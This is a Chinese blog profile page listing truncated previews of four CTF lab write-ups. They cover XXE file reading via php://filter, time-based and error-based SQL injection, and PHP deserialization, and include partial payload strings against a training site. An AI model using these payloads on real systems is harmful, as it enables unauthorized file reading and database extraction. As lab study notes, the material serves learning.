Track 实习学员

thieves

0关注
2粉丝
29文章
返回网站首页

您已发布 29篇文章作品写文章

Thieves XXE 实体注入 解题笔记

一上来什么玩意一大堆代码逐行分析,发现没有做过滤啊,有搞头遇事不决先抓包啊修改post并拼接以下代码<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/PHP

 2019-6-6
 0 
 299 

Thieves 延时注入 解题笔记

第一题:尝试'报错,存在注入点页面延迟594毫秒尝试延时 ?id=1' and sleep(3)%23页面延迟5秒使用?id=1' and sleep(if((length(database())=8),0,3))%23执行无延迟,说明 database() = 8尝试盲注?id=1' and sleep(if(ascii(substr(database(),1,1

 2019-6-6
 0 
 199 

Thieves 显错注入 解题笔记

第一题首先?id=1显示网页,发现'1',所以首先要闭合引号http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1' and 1=1发现,前面闭合了,后面没有闭合,所以使用--+来闭合后面的引号然后开始注入and 1=2测试注入点页面报错,发现注入点,猜字段数http://120.203.13.

 2019-6-5
 1 
 252 

Thieves 反序列化漏洞 解题笔记

首先登陆网站http://120.203.13.75:8123/uns/index.php?source=审计代码发现此处可以利用get传参然后发现当cookie传参满足md5($m) === $h时,才会进行序列化然后构造序列化语句a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";

 2019-2-11
 0 
 25